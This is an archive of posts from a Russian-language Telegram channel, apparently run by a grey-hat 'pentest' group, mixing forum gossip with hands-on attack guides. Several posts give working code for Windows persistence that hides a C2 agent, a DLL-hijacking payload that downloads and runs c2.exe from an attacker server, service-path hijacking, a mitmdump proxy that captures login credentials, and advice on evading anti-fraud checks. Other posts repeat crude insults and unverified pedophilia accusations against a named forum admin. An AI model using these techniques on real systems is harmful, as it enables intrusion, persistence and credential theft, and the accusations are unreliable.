KnightPentest🛡
Open in Telegram
⚠️Весь материал используйте только в ознакомительных целях⚠️ Чат, приходи общаться, бро @GreyHatChat
Show more6 843
Subscribers
No data24 hours
+6167 days
+3 49330 days
Posts Archive
6 843
Наш кодер продолжает раскрывать киберпреступления, которые нах*евертили эти фраера, эти недоброжелатели решили пойти против экспертов KnightPentest, а тут целый squad нах*й белых бандитов с опытом.
Злоумышленники получают доступ к wordpress (брутфорсят логи) 🔜 модифицируют конфигурационные файлы (к примеру index.php, т.к CMS WP динамическая, то index.html отсутствует, могут еще заливать свои вредоносные плагины). Весь прикол в том, что некоторые злоумышленники чушпаны-фраера, у них не было опытного наставника, образование 9 классов и они не подумали, как скрыться от индексации и поэтому мы можем найти сотни поломанных сайтов через гугл дорк
АК-47 x999xx выкладывал на экспу клок. Можете глянуть как по юзерагенту и referer обрабатывают поисковых ботов в одну стопку, людей из поисковой выдачи гугла редиректят на другой домен (фишинг/черный трафф), легитивных юзеров/админа на исходную страничку, чтобы не спалили, не накидали репортов=)))
@mirea - авторитетный блог по информационной безопасности💻
#pentest #web #xss_is #exploit_in
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let
Полный скрипт зальем в чат @greyhatchat
В основном этим скриптом пользуются киберпреступники с Украины. Дело в том, что поломаны только российские сайты и амеров=)))
Чтобы понять преступную схему достаточно обратиться к форуму exploit
/search/?q=клоакПолучить доступ ➡️ поставить клоак ➡️ залить шелл. Злоумышленники в основном ломают интернет магазины, чтобы сниффать CC(карточки). Также они могут работать максимально таргетировано и редиректить только тех юзеров у которых андроид устройство определенной модели(че ждем атаки на новые криптосмартфоны от Solana). Энтузиаст/специалист ИБ Максим
6 843
Посмотрели вот этот видеоролик @greyhatchat. Автор высказал свое непрофессиональное мнение и перешел на личности не понятно зачем=)) В каждой бочке затычка, блогерша не обладает полноценной информацией про админа BF. Блондинка просто решил рубануть бабок с рекламы онлайн курсов скиллфэктори.
- Откуда он узнал что главарь банды BF педофил? Блондинку он лично мейби того=))))
Голосование
- 🔥 спецслужбы отомстили админу BreachForums за многократный троллинг и подкинули видосов. А на форум поставили своих специалистов, чтобы следить за киберпреступниками и возможно иметь кэш.
- ❤️🩹 Спецслужбы ничего не подкидывали! Админ правда тихоня-педофил.
6 843
Киберпреступная группировка "InstallsKey" с exploit пыталась выехать на горбу главного кодера(KnightPentest).
- Главарь банды "doZKey" не смог создать файл на windows. Пришлось малыша кормить командами для powershell
- Преступник doZKey в поисках хороших соксов.
- Американский энтузиаст раскрывает схему doZKey и его банды InstallsKey - https://g0njxa.medium.com/privateloader-installskey-rewind-2023-c1ce027cbe65
- Преступник doZKey решил дать взятку, подогнать нам базу, но был послан куда подальше=)))
Рекламные стены, используемые этим сервисом сокращения ссылок, имеют поддельные кнопки, которые перенаправляют пользователей на страницы загрузок Privateloader. Cервер C2 и сервер, с которого сборка распространяется напрямую из Privateloader, одновременно имеют общие диапазоны IP-адресов, что заставляет нас думать, что они тесно связаны, и если другие сервисы PPI демонстрируют такое поведение, почему бы не InstallsKey. Фактически, первое упоминание о запросах на такую преступную работу было в отношении Nubank (бразильский необанк, крупнейший финтех-банк в Латинской Америке) 16 января 2023 года. Итак, doZKey действительно является главным администратором сервиса InstallsKey с оплатой за установку, но, похоже, в команде задействовано больше людей.Васян засунул свой нос в бразильские банки, финансовую систему США. Европу. Теперь он решил еще нахамить русским людям, нае*ать нашего кодера. @dozkey_exploit - сделка с мошенником, киберпреступником, чем занимается его банда. Наш кодер комментирует происходящую ситуацию
"Братан, я православный мне пох*й на его 300$. Клиент необразованный неадекват. Ко мне часто обращаются за помощью клиенты с Америки, я с ними держу платную связь на подобные случаи... Мы с ребятами не один сайт сверстали для амеров. Суть в чем, частично лица злоумышленников раскрыты. Если они продолжат мне хамить и оскорблять мой интеллектуальный труд передадим всю информацию иностранной разведке. На публику выставлять конфликт точно не будем."#киберпреступник #мошенник #exploit_in #xss_is #dozkey #InstallsKey
6 843
Всем привет. Если тут соберется много огней - 🔥 то наш главный кодер поделится опытом, расскажет про работу с хамоватыми киберпреступниками, которые привыкли мутить кнопку бабло и выезжать на чужом горбу=)
6 843
Способы закрепиться в системе без лишней воды👀
В основном для закрепления используются реестр, vbs скрипты, службы. Некоторые способы нельзя применить, если у вас недостаточно прав.
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MyProgram" -Value "C:\path\to\your\c2.exe"
Используем ключ Run. Как только пользователь войдет в систему, наш файл запустится автоматически и мы получим сессию.
Или аналогичных способ через каталог автозагрузки
```
C:\Users\knight\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c2.exe
```
Ярлыки с vbs скриптом.
Выбираем ярлык, который точно запустит офисный сотрудник. Это может быть Microsoft Edge к примеру или почтовый клиент. Создаем vbs скрипт.
Set WshShell = CreateObject("WScript.Shell")
' Запуск Chrome в видимом режиме
WshShell.Run """C:\Program Files\Google\Chrome\Application\chrome.exe""", 1, False
' Скрытый запуск программы c2.exe
WshShell.Run """C:\Users\Knight\Downloads\c2.exe""", 0, False
Меняем путь к исполняемому файлу chrome в свойствах. По итогу как только жертва запустит хром, запустится еще и наш агент для c2.Вот некоторые другие способы, которые нашлись в интернете Истории из жизни вредоносов: прячемся в автозагрузку ОС Windows Профили PowerShell Изучаем Adversarial Tactics, Techniques & Common Knowledge (ATT@CK). Enterprise Tactics. Часть 3 @mirea - авторитетный блог по информационной безопасности💻 #pentest #activedirectory
6 843
HAVOC C2 быстрая установка без рыжих видеоблогеров
1. Ставим необходимую версию GO: https://go.dev/dl/go1.18.linux-amd64.tar.gz
https://go.dev/doc/install - тут официальная документация
echo $SHELL
Если не знаете какая у вас командная оболочка, то выполните эту команду.
2. Официальная документация havoc: https://havocframework.com/docs/installation
3. Нас в первую очередь интересует конфигурационный файл - /Havoc/profiles/havoc.yaotl
teamserver {
Host = "10.0.0.197"
Port = 40056
Host подставляем свой. Чтобы узнать пропишите ifconfig. На нем будет стоять командный сервер, чтобы пентестеры могли подключаться.
Build {
Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
Путь до компилятора можете прописать вручную. Это нужно для компиляции агента.
Operators {
user "KnightPentest" {
Password = "passwd123"
}
Придумываем креды, чтобы пентестер мог подключиться к командному серверу.
4. Запускаем командный сервер
./havoc server --profile ./profiles/havoc.yaotl -v --debug
5. Запускаем клиентскую часть
./havoc client6. Удаление неактуальных сессий/профилей /Havoc/data/teamserver.db Тут хранится бд командного сервера, если у вас много неактуальных сессий, слушателей, то дропните этот файл, чтобы вручную не удалять каждый=) И у вас новый Havoc. /Havoc/data/client.db - тут хранятся профили клиентов (креды, названия профиля и т.д) тоже можно дропнуть, если потребуется. Подробнее: https://github.com/HavocFramework/Havoc/blob/main/WIKI.MD @mirea - авторитетный блог по информационной безопасности💻 #pentest #redteam #activedirectory
6 843
Локальное повышение привилегий windows (часть 3)
DLL Hijacking - это повышение прав с помощью подстановки своей DLL, если оригинальную не смогла найти система.
1. Каталог с приложением 2. C:\Windows\System32 3. C:\Windows\System 4. C:\Windows 5. Текущий рабочий каталог 6. Каталоги в пользовательской переменной окружения PATHЕсли разработчик напрямую не указал путь к dll, то система будет искать недостающий элемент сначала начиная с 1 пункта и так далее. 1) Запускаем инструмент ProcMon (для запуска нужны права администратора). В нашем чате есть очень хороший обзор этого инструмента. download: https://learn.microsoft.com/en-us/sysinternals/downloads/procmon 2) Переходим в директорию где находится исполняемый файл и проверяем есть ли права на запись. Если есть, то в дальнейшем мы туда загрузим свою dll, если нет прав, то проверяем права на 2 по 6 пункт.
powershell "(Get-Acl C:\Test\tool).Access"
3) Запускаем исполняемый файл с помощью которого мы хотим повысить права
4) Фильтруем сначала только наш процесс (исполняемый файл который мы запустили), далее фильтруем только .dll, чтобы отображались. После этого фильтруем, чтобы отображались только не найденные .dll.
5) Создаем свою собственную dll. Пускай она будет скачивать агента для C2 с нашего сервера и исполнять скачанный файл на захваченной системе.
#include <windows.h>
#include <stdlib.h>
BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved) {
switch (dwReason) {
case DLL_PROCESS_ATTACH: {
// Команда PowerShell для загрузки и выполнения файла
char command[] = "powershell -Command \"Invoke-WebRequest -Uri 'http://ip_сервера_где_лежит_агент_для_C2:8080/c2.exe' -OutFile 'C:\\Windows\\Tasks\\c2.exe'; Start-Process 'C:\\Windows\\Tasks\\c2.exe'\"";
// Структуры для запуска процесса
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
// Настройка на скрытие окна
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
// Создание процесса
if (CreateProcess(NULL, command, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
// Закрываем дескрипторы процесса
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
break;
}
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
6) Компилируем
x86_64-w64-mingw32-gcc -o not_found.dll -shared c2.c
not_found.dll - замените на название dll, которую не удалось найти (с помощью ProcMon ранее смотрели)
c2.c - тут лежит исходный код для dll
7) Мы переносим подмененную DLL на скомпрометированную машину, помещаем её в нужную директорию и запускаем исполняемый файл, который вызовет нашу DLL.
8) Мы получаем сессию. Права, которые вы получите при выполнении атаки DLL Hijacking, зависят от прав доступа и контекста безопасности процесса, который загружает вашу поддельную DLL.
Для защиты от DLL Hijacking используйте Safe DLL Search Mode, контролируйте права доступа к критическим каталогам, настраивайте AppLocker или WDAC для ограничения неподписанных DLL, и мониторьте систему с помощью Sysmon или ProcMon🙏
@mirea - авторитетный блог по информационной безопасности💻
#windows #pentest #activedirectory6 843
Получаем первоначальный доступ благодаря инструменту mitmdump
mitmdump — это консольный инструмент, который является частью проекта mitmproxy и используется для перехвата, анализа и изменения HTTP/HTTPS трафика.условно мы подключены к впн 10.0.0.197 - это наша машинка на которой мы будем запускать mitmproxy. 10.0.0.5 - тут работает веб приложение. Попробуем перехватить запрос, посмотрим в каком формате передаются креды.
POST /api/auth/login?locale=ru HTTP/1.1
Host: 10.109.0.5
Content-Length: 55
Accept: application/json, text/plain, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: application/json
Origin: http://10.109.0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{"login":"student","password":"Hello123#","code":""}
Как видим используется метод POST и данные передаются в JSON.
Напишем скрипт для mitmdump, который будет обрабатывать перехваченные POST запросы и преобразовывать JSON в clear text. Добавим также обработку редиректов.
from mitmproxy import http
def response(flow: http.HTTPFlow) -> None:
# Проверяем, если это редирект (HTTP статус 302)
if flow.response.status_code == 302:
location = flow.response.headers.get('Location', '')
if location:
# Заменяем адрес на прокси
new_location = location.replace('10.0.0.5', '10.0.0.197')
flow.response.headers['Location'] = new_location
def request(flow: http.HTTPFlow) -> None:
# Перехватываем POST-запросы
if flow.request.method == "POST":
# Выводим содержимое POST-запроса
print("Перехваченные данные POST-запроса:")
print(flow.request.text)
# Если данные в формате формы (application/x-www-form-urlencoded), можно использовать urlencoded_form
if flow.request.urlencoded_form:
print("Данные формы:")
for k, v in flow.request.urlencoded_form.items():
print(f"{k}: {v}")
Запускаем все это дело
mitmdump --mode reverse:http://10.109.0.5:80 -p 443 -s mit.py --set listen_host=10.0.0.197
10.0.0.197:443 - теперь тут легитимный сайт, который работает через наш прокси. Если сотрудник введет свои данные, то мы их получим в консоли.
Перехваченный JSON POST-запрос:
{"login":"helo","password":"123","code":""}
Логин: helo
Пароль: 123
К этому всему обычно добавляются другие сетевые атаки. Например DNS-спуфинг и ARP-спуфинг.
@mirea - авторитетный блог по информационной безопасности💻
#pentest #activedirectory6 843
Вот что о нас думают медийные люди в хакерской среде о нашем братке студенте и о международной #whitehat группировке KnightPentest:
admin xss (ex. damagelab) высказался про student`a (нашего прошлого редактора, который уволен)
student был классный парень, писал полезные статьи. Но потом он начал работать с этими слухами. А это неприятнейшее и бесполезное занятие. Честно, какая-то фигня.
вернитесь к истокам =) Пишите для своего канала. У вас хорошо получалось. Завязывайте уже генерировать этот бред и сплетни. Честно. Просто приятельский совет.Старший пентестер #bi_zone (в прошлом) Лиза (x4n4x security)
Я читаю ваши посты, как анекдоты. Вы очень хорошие парни, но не оскорбляйте меня. А то я могу обидеться, если у меня будет плохое настроение. Я вас очень уважаю и ценю, я же не просто так ваш блог прорекламировала. Зачем нам друг-друга топить, если мы можем друг-друга поддерживать. Давайте снова встретимся в Москве, в этот раз пиво покупаю я, будем на элитном, куплю корону.Владелец обменника Comedy
Давай восстанавливай аккаунт студента и пиши статьи как раньше!Российский авторитет conti_niy
Любой твой персонаж выдаёт в себе студента. Но я тебя лично не знаю, ты на всю жизнь для меня будешь (первый ник studenta) который учит взрослых дядь жить, хоть сам ещё молоко материское на губах не высушил)Украинские хакактивисты
KnightPentest - это сборище филантропов и гениев!=) Мы не сразу выкупили их юмор, но мы убедились, что эти парни, рыцари порядочные люди и никому зла не желают.Нужно немного терпения! После задержания Павла Дурова в telegra.ph нельзя прикреплять скриншоты, увы только по ссылке. Авторитет bratva вып*здинул нас с форума, поскольку мы плохо влияем на молодежь и на их хакерскую среду. Нам требуется немного времени, чтобы запустить свой проект и хранить материал на своих серверах.
Нам нигде уже не рады. Единственный вариант - это создавать свое.#xss_is #exploit_in #damagelab #pentest
6 843
ZoomEye — это передовая поисковая система в киберпространстве, разработанная и поддерживаемая KnownSec Hong Kong.
⚠️ Затянувшийся конфликт между Россией и Украиной: Частые простои критической инфраструктуры демонстрируют хрупкость кибербезопасности в условиях современной войны! 💥 С момента полномасштабной эскалации российско-украинского конфликта 24 февраля 2022 года кибернетические активы Украины подверглись массированным атакам, в результате которых критической информационной инфраструктуре был нанесен серьезный ущерб. Согласно данным картографии киберактивов ZoomEye, только за первые две недели войны уровень простоя критической инфраструктуры Украины резко возрос: с 57,81 % 24 февраля до 66,00 % к 7 марта, в то время как уровень простоя некритической инфраструктуры составил всего 16,07 %. 📉 Эти данные напрямую отражают стратегическую нацеленность России на военную, правительственную и энергетическую критически важную информационную инфраструктуру Украины.Оригинал: https://t.me/c/2121003331/5451 @mirea - авторитетный блог по информационной безопасности💻
6 843
Влиятельные русскоязычные специалисты "KnightPentest" нашли критическую уязвимость на форуме exploit.
Этот фраерский форум закрывался на обнову. После обновы мы обнаружили, что наша гарант сделка пропала.
Администрация исправила найденную уязвимость.
Багбаунти: Мы ушли в минус на 5% и еще попросили тон сменить😁
В п*зду эти ваши багбаунти=) Так и делай добро людям.
6 843
Локальное повышение привилегий windows (часть 2)
Запускаем утилиту SharpUp, чтобы проверить какие службы мы можем модифицировать.
"C:\Users\user\Downloads\SharpUp (2).exe" audit
=== Modifiable Service Binaries === (это относится к первой части, замена исполняемого файла)
=== Modifiable Services === (нас интересуют эта табличка)
Узнаем запущена ли служба, которую нам подсветил SharpUp
sc.exe query KnightPentestЕсли запущена, то отключаем.
sc.exe stop KnightPentest
Узнаем какие права у нас для службы, чтобы убедиться, что мы можем ее модифицировать.
sc.exe sdshow KnightPentestoutput: D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;DCRPWPCR;;;S-1-5-21-912991490-3884206882-218743976-1002) WP — изменение свойств службы. Меняем путь к исполняемому файлу
sc.exe config KnightPentest binpath= "C:\Users\zlo\c2.exe"
Запускаем службу
sc.exe start KnightPentest
Далее нам прилетает сессия в наш C2. Если служба работает с высокими привилегиями (например, под учётной записью SYSTEM), вы получите соответствующий уровень доступа.
@mirea - авторитетный блог по информационной безопасности💻
#windows #pentest #activedirectory6 843
Правильно) у богатого американца хуй вкуснее
Предприниматель — это тот, кто спрыгнет со скалы и соберёт самолёт, пока летит внизЕсли вы свою жопу не смогли пристроить в русскоязычных странах, то заграницей вас юзанут как дешевых шлюх и вернетесь обратно.
6 843
Локальное повышение привилегий windows (часть 1)
Get-WmiObject Win32_Service | Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName } | ForEach-Object { if ($_.PathName -match '"[^"]+\.exe"|[A-Za-z]:\\[^ ]+\.exe') { $dir = Split-Path $matches[0]; if (Test-Path $dir) { try { $tempFile = [System.IO.Path]::GetTempFileName(); Move-Item -Path $tempFile -Destination "$dir\temp_test.tmp" -Force -ErrorAction SilentlyContinue; if (Test-Path "$dir\temp_test.tmp") { Remove-Item "$dir\temp_test.tmp" -Force -ErrorAction SilentlyContinue; Write-Output "Can create and delete files in $dir" } } catch {} } } } | Sort-Object -Unique
Данный скрипт находит все службы на виндовс машинке у которых включен "автозапуск". Сохраняет пути к исполняемым файлам и проверяет есть ли у нас право на создание файла. Если есть, то выводит директорию. Данный скрипт сырой, вы можете его доделать основываясь на сорцы инструмента SharpUp
В нейронку закиньте сорцы и попросите переписать скрипт на powershell в одну строчку.
Далее достаточно сгенерировать агента для C2 и подменить оригинальный бинарь на нашего агента.
Перезагружаем машину и получаем сессию🙏
Если злоумышленник может создать или изменить файл в каталоге службы, это может привести к выполнению вредоносного кода с привилегиями системы.@mirea - авторитетный блог по информационной безопасности💻 #pentest #windows #activedirectory #redteam
6 843
Чтобы обойти антифрод нужно перестать быть босяком. Часто помогают хорошие соксы и актуальные юзерагенты.
Есть человек, который собирает юзерагенты для разработчиков, чтобы их легко можно было получить по ID, так сказать публичная бд.
https://www.useragentdb.com/ua/ua.php?id=1833337
id подбираете и парсите в отдельный .txt юзерагенты.
Многие из этих сайтов собирают информацию о UA.
WhatIsMyBrowser.com UserAgentString.com DeviceAtlas.com WhatsMyUA.info UserAgentList.com UserAgents.io BrowserLeaks.com UserAgentAPI.com TechPatterns.com UaTracker.com UserAgentDetails.com MyUserAgentString.com WhatIsMyUserAgent.net UserAgentDB.com HttpUserAgent.org UserAgent.net UserAgentSpy.com UserAgentMatcher.com IPQualityScore.com WebBrowserTools.com WhatsMyUserAgent.org UserAgentLookup.com MyUserAgent.com UserAgentTool.com WhatIsMyUA.com UserAgentString.info WebUtils.pl GeoPlugin.com SamiDaoud.com UserAgentAnalyzer.com WhatIsMyBrowserName.com UserAgentCheck.com UserAgentLookupTool.com IPAddressGuide.com TestYourBrowser.com UserAgentParser.com CheckMyUA.com UserAgentStringParse.com UserAgentDatabase.com WhatIsMyIP.com MyIp.ms WhatIsMyDevice.com UserAgentStringFinder.com Spyber.com WhatIsYourBrowser.org BrowserStack.com MyIp.io Ip2Location.com HttpBin.org UserAgent.me@mirea - авторитетный блог по информационной безопасности💻
6 843
Список групп, где сидят иностранные злоумышленники.
Так вы можете определить по каким сервисам они работают.
@mirea - авторитетный блог по информационной безопасности💻
6 843
Иностранные преступники майнят Monero на уязвимых машинах.
@mirea - авторитетный блог по информационной безопасности💻
6 843
Увеличиваем размер жесткого диска windows без е*ли и просмотра скучных говнороликов на 10 минут:)
Простая инструкция без лишних подробностей:
Определите путь к вашему виртуальному диску в разделе "Носители" VirtualBox.
Перейдите в папку, где установлен VBoxManage (обычно это: C:\Program Files\Oracle\VirtualBox).
Введите команду в PowerShell (от имени администратора):
.\VBoxManage modifyhd "D:\VirtualBox\VB\win10\win10.vdi" --resize 102400
Здесь:
102400 MB — новый размер диска (100 ГБ).
"D:\VirtualBox\VB\win10\win10.vdi" — путь к вашему существующему диску.
На гостевой ОС (Windows) откройте Disk Management (Управление дисками).
Если рядом с основным диском есть Recovery Partition, его нужно удалить, иначе не получится расширить основной диск.
В PowerShell (с правами администратора) выполните:
Get-Partition
Найдите нужный раздел и выполните команду для его удаления:
Remove-Partition -DiskNumber <номер диска> -PartitionNumber <номер раздела>
Вернитесь в Disk Management и воспользуйтесь опцией Extend Volume, чтобы расширить диск на доступное нераспределённое пространство.
Быстро, чётко и ахуенно!
#windows